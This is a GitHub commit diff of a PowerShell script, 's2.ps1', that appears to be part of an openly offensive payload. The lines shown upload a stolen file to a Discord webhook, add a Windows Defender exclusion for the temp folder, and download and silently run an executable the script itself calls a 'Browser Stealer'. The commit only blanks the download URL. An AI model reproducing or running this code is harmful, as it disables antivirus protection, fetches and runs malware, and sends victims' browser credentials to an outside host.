Update s2.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-28 23:57:12 -06:00 committed by GitHub
parent 600fcce912
commit b189f5c8e1
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -53,7 +53,7 @@ if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName
Add-MpPreference -ExclusionPath $env:tmp
# Download the exe and save it to temp directory
iwr "https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/browser.exe" -outfile "$env:tmp\browser.exe"
iwr "" -outfile "$env:tmp\browser.exe"
# Execute the Browser Stealer
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait